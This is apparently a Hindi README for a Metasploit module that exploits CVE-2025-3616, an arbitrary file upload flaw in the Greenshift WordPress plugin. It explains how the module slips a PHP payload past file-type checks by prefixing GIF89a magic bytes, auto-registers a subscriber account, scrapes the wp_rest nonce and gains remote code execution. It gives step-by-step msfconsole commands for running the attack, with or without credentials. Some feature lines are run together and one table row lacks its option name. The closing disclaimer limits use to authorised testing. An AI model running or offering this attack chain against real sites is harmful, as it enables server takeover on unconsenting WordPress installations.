
Metasploit मॉड्यूल जो Greenshift WordPress प्लगइन (CVE-2025-3616) में मनमाने फ़ाइल अपलोड का शोषण करता है, ताकि MIME स्पूफिंग के माध्यम से RCE प्राप्त किया जा सके, साथ ही स्वतः-पंजीकरण और nonce निष्कर्षण के साथ।
इस रिपॉज़िटरी में CVE-2025-3616 का शोषण करने के लिए एक मेटास्प्लोइट मॉड्यूल शामिल है, जो ग्रीनशिफ्ट वर्डप्रेस प्लगइन (संस्करण 11.4 से 11.4.5) में एक मनमाना फ़ाइल अपलोड कमजोरी है।
यह शोषण प्रमाणित उपयोगकर्ताओं (Subscriber+) को मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे रिमोट कोड निष्पादन (RCE) होता है। यह GIF मैजिक बाइट्स (GIF89a;) का उपयोग करके MIME प्रकार को धोखा देकर प्लगइन के फ़ाइल प्रकार सत्यापन को बायपास करता है।
USERNAME/PASSWORD) के साथ लॉगिन का समर्थन करता है।REGISTER विकल्प शामिल करता है जो स्वचालित रूप से एक नए उपयोगकर्ता को पंजीकृत करता है और ताज़ा सत्र कुकीज़ का उपयोग करके कमजोरी का शोषण करता है (यदि लक्ष्य पर पंजीकरण सक्षम है तो उपयोगी)।wp_rest नॉन्स को स्वचालित रूप से स्क्रैप करता है।finfo_file() सत्यापन को बायपास करने के लिए PHP पेलोड में GIF मैजिक बाइट्स जोड़ता है।सुनिश्चित करें कि आपके पास मेटास्प्लोइट फ्रेमवर्क स्थापित है।
wp_greenshift_file_upload.rb को अपनी स्थानीय मॉड्यूल निर्देशिका में कॉपी करें:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
msfconsole शुरू करें और मॉड्यूल को पुनः लोड करें:
msfconsole
msf6 > reload_all
यदि लक्ष्य पर उपयोगकर्ता पंजीकरण सक्षम है, तो आपको क्रेडेंशियल्स की आवश्यकता नहीं है।
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
यदि आपके पास पहले से एक वैध उपयोगकर्ता है (Subscriber या उच्च):
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
| विकल्प | आवश्यक | विवरण |
|---|---|---|
| RHOSTS | हाँ | लक्ष्य पता |
| LHOST | हाँ | सुनने का पता (आपका IP) |
| REGISTER | नहीं | स्वचालित रूप से एक नया खाता पंजीकृत करने के लिए true पर सेट करें (डिफ़ॉल्ट: false) |
| USERNAME | नहीं | वर्डप्रेस उपयोगकर्ता नाम (यदि REGISTER false है तो आवश्यक) |
| PASSWORD | नहीं | वर्डप्रेस पासवर्ड (यदि REGISTER false है तो आवश्यक) |
| नहीं | पंजीकरण के लिए ईमेल (वैकल्पिक, खाली होने पर स्वचालित रूप से उत्पन्न) |
यह मॉड्यूल केवल शैक्षणिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस कोड का उपयोग अवैध है।